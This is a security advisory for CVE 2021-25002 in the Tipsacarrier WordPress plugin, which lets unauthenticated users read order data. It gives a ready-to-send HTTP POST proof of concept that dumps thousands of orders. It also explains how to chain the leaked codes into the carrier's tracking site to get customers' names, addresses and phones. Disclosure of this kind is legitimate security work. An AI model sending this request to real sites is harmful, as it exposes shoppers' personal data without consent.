Tipsacarrier < 1.5.0.5 – Unauthenticated Orders Disclosure | CVE 2021-25002

Description

The plugin does not have any authorisation check in place some functions, which could allow unauthenticated users to access Orders data which could be used to retrieve the client full address, name and phone via tracking URL

Vendor was notified on November 26th, 2021, did not reply nor fix the issue

Proof of Concept

POST /wp-content/plugins/tipsacarrier/js/consulta_datos.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Upgrade-Insecure-Requests: 1

page=1&rows=5000&sidx=id_envio_order&sord=DESC&_search=true

The response includes the same data that only an administrator in the plugin page can see. Including:
- The [orderid] number.
- [creation date] for the order.
- The [shipping agency order code] which you can use at the agency website tracking URL: https://dinapaqweb.tipsa-dinapaq.com/dinapaqweb/detalle_envio.php?servicio=[shipping agency order code]&fecha=[creation date in dd/mm/YYYY format] to retrieve client full address, full name, phone, and other data.
- The order shipping status [shipping agency status].
- An URL where you can download the printing tag accessing to [printing tag url] with no authentication, located in /wp-content/uploads.